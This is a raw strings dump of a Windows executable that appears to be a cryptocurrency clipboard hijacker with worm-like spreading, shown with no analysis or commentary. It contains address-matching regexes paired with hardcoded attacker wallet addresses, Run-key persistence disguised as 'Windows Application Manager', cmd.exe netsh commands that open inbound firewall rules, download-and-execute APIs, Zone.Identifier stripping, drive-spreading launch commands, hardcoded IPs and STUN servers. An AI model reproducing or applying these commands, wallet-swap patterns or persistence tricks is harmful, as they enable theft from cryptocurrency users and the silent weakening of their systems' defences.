!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
PE;QEuUh
QQSVWd
0WWWWW
0WWWWW
uL9=(\D
teh3zA
Ht Hu4j
s[S;7|G;w
tR99u2
0SSSSS
>=Yt1j
j@j ^V
0A@@Ju
to= YD
URPQQh$
^SSSSS
j"^SSSSS
HHtYHHt
j hx5B
;t$,v-
UQPXY]Y[
0SSSSS
0SSSSS
GWh(!B
t"SS9]
FVh(!B
v$;5DYD
PPPPPPPP
PPPPPPPP
t+WWVPV
bad allocation
mapped_address
xor_mapped_address
changed_address
public address
local address
RtlGetVersion
NtQueryInformationToken
NtSetInformationThread
RtlFreeSid
NtDuplicateToken
NtSetInformationToken
NtFilterToken
NtOpenProcessToken
RtlLengthSid
RtlAllocateAndInitializeSid
RtlRandomEx
%s--%s
Content-Disposition: form-data; name="%s"
--%s--
ntdll.dll
Microsoft Enhanced Cryptographic Provider v1.0
Microsoft Enhanced Cryptographic Provider v1.0
sperm_mgr thread shutdown
%06u%06u%06u
domain,port,weekly_quality,type
domain,port,weekly_quality,type
%s,%u,%i,1
%s,%u,%u,2
too much peer data coming from this peer:
con_mgr thread shutdown
RtlGetVersion
ntdll.dll
ntdll.dll
RtlRandomEx
deque<T> too long
Fbad allocation
string too long
invalid string position
Unknown exception
(null)
`h````
xpxxxx
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
CorExitProcess
bad exception
runtime error
TLOSS error
SING error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
`h`hhh
xppwpp
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
CONOUT$
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
URLDownloadToFileW
urlmon.dll
lstrlenA
CloseHandle
TerminateProcess
WaitForSingleObject
lstrcpynW
FileTimeToSystemTime
GetProcAddress
LoadLibraryA
MapViewOfFile
CreateFileMappingW
GetFileSize
CreateFileW
UnmapViewOfFile
lstrlenW
GetExitCodeThread
lstrcatW
CreateTimerQueueTimer
GetTickCount
DeleteTimerQueueTimer
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
DeleteCriticalSection
SwitchToThread
CreateIoCompletionPort
GetModuleFileNameW
TerminateThread
PostQueuedCompletionStatus
DeleteFileW
FlushViewOfFile
GetCurrentProcessId
GetCurrentThreadId
GetQueuedCompletionStatus
WaitForMultipleObjects
HeapAlloc
HeapReAlloc
GetProcessHeap
HeapFree
OpenProcess
FindClose
FindNextFileW
FindFirstFileW
LocalFree
CreateProcessW
lstrcmpiW
FlushFileBuffers
WriteFile
GetLastError
SetFilePointer
GetFileSizeEx
ReleaseMutex
CreateMutexW
GetNativeSystemInfo
MultiByteToWideChar
WideCharToMultiByte
GetModuleHandleW
ExpandEnvironmentStringsW
GetThreadId
ExitProcess
CopyFileW
SetFileAttributesW
CreateDirectoryW
lstrcmpW
GlobalFree
GlobalUnlock
GlobalLock
GlobalAlloc
MoveFileExW
GetDriveTypeW
DeviceIoControl
GetVolumeNameForVolumeMountPointW
GetSystemDirectoryW
GetVolumeInformationW
FindVolumeClose
FindNextVolumeW
FindFirstVolumeW
KERNEL32.dll
CharLowerW
GetWindowThreadProcessId
GetShellWindow
DispatchMessageW
TranslateMessage
GetMessageW
RegisterClassExW
wsprintfW
UnregisterClassW
DestroyWindow
RemoveClipboardFormatListener
AddClipboardFormatListener
CreateWindowExW
PostThreadMessageW
OpenClipboard
CloseClipboard
SetClipboardData
EmptyClipboard
DefWindowProcW
GetClipboardData
GetPriorityClipboardFormat
DefWindowProcA
USER32.dll
OpenProcessToken
CryptDestroyKey
CryptGetKeyParam
CryptImportKey
CryptDestroyHash
CryptVerifySignatureA
CryptHashData
CryptCreateHash
CryptReleaseContext
CryptAcquireContextA
ConvertStringSecurityDescriptorToSecurityDescriptorW
ImpersonateLoggedOnUser
RevertToSelf
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegSetValueExW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteW
SHChangeNotify
SHGetFolderPathW
SHELL32.dll
CoUninitialize
CoCreateInstance
CoInitializeEx
ole32.dll
OLEAUT32.dll
freeaddrinfo
getaddrinfo
WSARecvFrom
WSASendTo
WSASocketW
WS2_32.dll
PathCombineW
PathRemoveFileSpecW
StrToIntA
StrDupW
PathFindExtensionW
PathFileExistsW
StrStrNIW
StrCmpNIW
StrStrIW
PathAddExtensionW
PathStripToRootW
PathAppendW
SHLWAPI.dll
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
MPR.dll
InternetCloseHandle
InternetReadFile
HttpQueryInfoW
HttpSendRequestW
HttpAddRequestHeadersW
HttpOpenRequestW
InternetConnectW
InternetOpenW
InternetCrackUrlW
InternetOpenUrlW
WININET.dll
UuidCreate
RPCRT4.dll
ExitThread
CreateThread
GetSystemTimeAsFileTime
RtlUnwind
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
RaiseException
GetCommandLineA
GetStartupInfoA
HeapCreate
VirtualFree
VirtualAlloc
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
InterlockedIncrement
SetLastError
InterlockedDecrement
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
SetHandleCount
GetFileType
QueryPerformanceCounter
GetConsoleCP
GetConsoleMode
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
InitializeCriticalSectionAndSpinCount
HeapSize
SetStdHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
GetLocaleInfoA
CreateFileA
xR>}'?
stun.levigo.de
stun.b2b2c.ca
stun.1und1.de
stun.rolmail.net
stun.aa.net.uk
stun.ozekiphone.com
stun.nottingham.ac.uk
stun.epygi.com
stun.voip.aebc.com
stun.cognitoys.com
stun.anlx.net
stun.demos.ru
stun.siplogin.de
stun.bahnhof.net
stun.sipgate.net
stun.faktortel.com.au
stun.voxgratia.org
stun.voip.aebc.com
stun.rockenstein.de
stun.ozekiphone.com
stun.barracuda.com
stun.tng.de
stun.usfamily.net
stun.gmx.net
stun.gmx.de
stun.demos.su
stun.counterpath.net
stun.sigmavoip.com
stun.jabbim.cz
stun.aa.net.uk
stun.xten.com
stun.solnet.ch
stun.eoni.com
stun.crimeastar.net
stun.voztele.com
stun.cablenet-as.net
stun.voxgratia.org
stun.ivao.aero
stun.ekiga.net
stun.srce.hr
stun.russian-club.net
stun.callwithus.com
stun.nova.is
stun.infra.net
stun.halonet.pl
stun.comrex.com
stun.commpeak.com
stun.vivox.com
stun.xtratelecom.es
stun.pjsip.org
stun.nautile.nc
stun.voipgain.com
stun.schlund.de
stun.3cx.com
stun.mit.de
stun.aeta-audio.com
stun.callromania.ro
stun.12connect.com
stun.lundimatin.fr
stun.freeswitch.org
stun.nfon.net
stun.snafu.de
stun.aeta.com
stun.hosteurope.de
stun.zoiper.com
stun.tel.lu
stun.modulus.gr
stun.voip.eutelia.it
stun.fh-stralsund.de
stun.vo.lu
stun.twt.it
stun.rackco.com
time.windows.com
time-nw.nist.gov
time.nist.gov
time-a.nist.gov
time-b.nist.gov
us.pool.ntp.org
nist1-pa.ustiming.org
nist1-nj2.ustiming.org
79.141.72.52
79.141.72.138
79.141.72.156
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVexception@std@@
.?AVbad_alloc@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
0,1Y1A3]3
4$4Z425
:+<F<W<w<
B0R0\0~0
7.7Q7s7
9 :8:B:W:{:
;W;d;q;P<Z<u=
=1>J>|?
<.<e<{<
1$191Z1
3>4P4_4l4
8&858Q8
8T:a:x:
4(4H5v5
7=7U7}7
7:8A8H8N8
:7<W<f<s<
293C3Z3~3
4*444^4
8C8P8|8
<)=9=H=W=_=y=
> >0>6>b>
?&?3?C?n?{?
0)060F0w0
1&171d1k1|1
3*3_3u3
8,8D8^8
91:>:]:
:+;9;t;
1 101D1U1i1u1
253>3D3g3
5-565@5^5t5
5*676S6`6
7!7<7O7v7{7
8&989N9e9j9v9
: :4:~:
;#<G<X<n<
=8?U?b?}?
060U0x0~0
00161J1
1-2D2N2U2w2
2v4V668v>
(=F=p=
181B1_1p1z1
8 8#8'8+8/83878;8?8C8G8K8O8S8W8[8_8c8g8k8o8s8w8{8
9 9$9M9s9
:-;4;8;<;@;D;H;L;P;
<(<w<}<
1?1G1W1
3f3 474<4
9!9(9,9094989<9@9D9
:,:3:8:<:@:a:
:*;0;4;8;<;
1,3Q3e3w3~3
2,5054585<5@5D5H5Y5u5
6 6I6W6]6
:3:8:G:P:]:h:z:
; ;%;3;:;?;H;U;[;u;
0U2`2h2}2
4&5,585
7#7.7:7O7V7j7q7
8&80868B8Q8W8l8}8
9+9@9f9
<$<,<3<8<@<I<U<Z<_<e<i<o<t<z<
="=(=D=
>->A>G>
0$0>0J0R0b0w0
2`3i3u3
4(5A5j5o5
4!4*4j4o4
2 2$2(2,2024282>2G2g2l2
:!;&;G;L;r;
<#<)<0<7<><E<L<S<Z<b<j<r<~<
<I=V=o=
6 7M7`7f7
8+8@8J8p8
;&<1<;<T<^<q<
?5?=?E?\?u?
2(3W3x3
6.777L7|7
7h8q8w8
;1<?<E<U<Z<r<x<
<%=B=_=
1!101>1F1S1q1{1
2C2P2U2c2>3a3l3
3G4Y4f4r4|4
708:8R8Y8c8k8x8
<"<4<F<X<j<|<*>1>
1"1'1-141F1
4+6h6r6
:9:Q:z:
D0H0L0P0T0X0`0d0h0
0 1$1(1,101
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
:\;`;p;t;x;|;
<,<0<@<D<H<P<h<x<|<
=$=(=8=<=@=H=`=
><>H>h>t>
? ?(?,?0?8?L?T?h?p?
(000T0h0p0x0
1 1(1<1X1x1
2 2@2`2l2
34383H3l3x3
404L4P4l4p4
505P5l5p5
686X6x6
;(;,;P;`;d;|; >$>0>P>T>
?$?,?4?8?
8 8$8(8,8084888<8X8\8`8d8h8l8p8t8x8|8
9 9$9(9,9094989<9@9D9P9
Port %u
/quiet
wusa.exe
cmd.exe
3/c netsh advfirewall firewall show rule name="%s" || netsh firewall add allowedprogram mode=ENABLE profile=ALL name="%s" program="%s"
/c netsh advfirewall firewall show rule name="%s" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="%s" program="%s"
Accept-Encoding: identity
/c netsh advfirewall firewall show rule "Port %lu %s" || netsh firewall add portopening UDP %lu "Port %lu %s"
x/c netsh advfirewall firewall show rule "Port %lu %s" || netsh advfirewall firewall add rule name="Port %lu %s" dir=in action=allow protocol=UDP localport=%lu
/c netsh firewall set service type= upnp mode = enable
Content-Length: %u
Content-Type:multipart/form-data; boundary=%S
nS:(ML;;NW;;;LW)
%temp%
%ls\%d%d.exe
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
%ls:Zone.Identifier
%ls\%d%d.exe
%ls:Zone.Identifier
%userprofile%
System Volume Information
%windir%\system32\cmd.exe
(null)
KERNEL32.DLL
mscoree.dll
((((( H
h(((( H
H
x3x7x8x0x
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
winappmgr.exe
Windows Application Manager
Windows Application Manager
Windows Application Manager\stremcfg.bin
bitcoin:
[13][a-km-zA-HJ-NP-Z1-9]{25,34}|(bc1)[0-9A-Za-z]{39,59}
12HwDCzYe1CgnuJXmi85REzMS6ZwXsrkJ5
3Emi49QRuH6M77HPdk3dmvVZhMEwKRhXRx
bc1q9zxfs79ndrvych8v6hqcfl8xgkftma8uku4pyl
bitcoincash:
((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}
bitcoincash:qp7dkrjpkrc296vlqw2lt33k7ycjl4lh9yq68uzaqp
ethereum:
(0x)[0-9A-Fa-f]{40}
0x7272121B7bF0Fc62B3Af9547d3d1c4e5F4EA1f2a
dogecoin:
(D|A|9)[a-km-zA-HJ-NP-Z1-9]{33,34}
DLWfFuQHRx9QqK1RUQiGLcSctZzpvz8AXU
[X|7][0-9A-Za-z]{33}
Xt9jAQdoXZoLnmqv3HXKVbVn5do4iCfKbV
monero:
[48][a-zA-Z|\d]{94}([a-zA-Z|\d]{11})?
446bbRpMQYCQm4jL9RmnTxPZKsrwntRWaKGNpbSpEVN8UpVktZGCCjYYZDjKG2xQhkRjfiGfiCxxv3rgasBJjyfkJARJ6JP
(A)[A-Za-z0-9]{33}
AMNEYRQXEvKouGABPB4bxcASM3hD97oryf
ripple:
r[0-9a-zA-Z]{33}
rw3Dm2KxwzxAtf865Dk6R8Rt9jZJVhPwTE
stellar:
G[ABCDEFGHIJKLMNOPQRSTUVWXYZ234567]{55}
GACV3NCXXTV5UFCHZVI7CLT7WGFNYSHN6F3F7SWTP2DIOVXLQLLLASEL
cosmos:
c[0-9a-zA-Z]{41,47}
cosmos1lv7l3c9fal8k3d7dsfc3m7ywhh0mj4xjpnr6ef
listk:
[0-9]{1,20}L
15284348885444593022L
polkadot:
1[0-9a-zA-Z]{47}
1434dZ4JZQPwWJoYJqCrQBYThb7s7vdFfH2yCHAYbmLMtroP
voldriver
/c start .\%s & start .\%s\%s
%SystemRoot%\system32\shell32.dll
voldriver.exe